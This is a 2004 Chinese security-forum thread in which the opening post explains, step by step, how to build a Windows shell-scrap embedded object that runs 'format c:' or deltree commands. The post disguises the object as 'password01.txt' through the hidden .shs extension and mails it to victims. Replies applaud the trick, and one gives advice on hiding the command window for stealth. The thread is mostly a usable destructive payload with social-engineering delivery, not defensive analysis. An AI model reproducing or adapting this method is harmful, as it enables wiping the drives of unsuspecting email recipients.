|
作者: georgeju [georgeju] 论坛用户 | 登录 |
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。 2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。 3.选中该插入对象的图标,选择菜单栏中的“编辑包对象编辑包”(如图1)。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。 4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。 5.选择菜单栏中的“编辑卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。 6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。 7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.shs”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出dos运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:*.* c:*.* d:*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:windowssystem*.* 则是删除对方c:windowssystem目录底下的所有文件.(当然大家可以改成其它的命令) 真的很简单,就这样一个恶意的攻击程序被弄出来了,太可怕了! 注意:千万不要尝试喔,否则文件丢失、电脑就无法启动了 我自己也没试~~~ |
地主 发表时间: 04-02-05 09:11 |
回复: afan271314 [afan271314] 论坛用户 | 登录 |
顶一下 |
B1层 发表时间: 04-02-05 09:41 |
回复: kyjqy521 [kyjqy521] 论坛用户 | 登录 |
这我也会,你是不是把黑客奇技赢巧大搜捕上的改了????? |
B2层 发表时间: 04-02-05 10:09 |
回复: sd577035 [sd577035] 论坛用户 | 登录 |
爽~~~~~~~但是成功率怎么样哈`~~~~谁试过~~ |
B3层 发表时间: 04-02-05 10:21 |
回复: NetPolaris [newmyth21] 论坛用户 | 登录 |
我也顶一下。 |
B4层 发表时间: 04-02-05 13:22 |
回复: lx5227015 [lx5227015] 论坛用户 | 登录 |
顶一下 |
B5层 发表时间: 04-02-05 14:02 |
回复: dsx [dsx] 论坛用户 | 登录 |
够狠!太狠了 |
B6层 发表时间: 04-02-06 16:14 |
回复: lqfrla [lqfrla] 论坛用户 | 登录 |
|
B7层 发表时间: 04-02-06 20:56 |
回复: saman [saman] 论坛用户 | 登录 |
能否不袒出运行窗口? |
B8层 发表时间: 04-02-07 00:36 |
回复: abctm [abctm] 版主 | 登录 |
这个东西也有2年了,老 |
B9层 发表时间: 04-02-07 06:58 |
回复: shan_08 [shan_08] 论坛用户 | 登录 |
佩服!!! |
B10层 发表时间: 04-02-07 09:57 |
回复: c [c] 论坛用户 | 登录 |
我在98下就用过这东西 最好在加个 -mix 这样dos的对话框就会自动最小化 隐蔽性好 |
B11层 发表时间: 04-02-07 11:05 |
回复: eeeee7608 [eeeee7608] 论坛用户 | 登录 |
地球人都会了,没必要再帖了 |
B12层 发表时间: 04-02-09 16:29 |
回复: wangsong [wangsong] 论坛用户 | 登录 |
精神很好 |
B13层 发表时间: 04-02-10 19:31 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号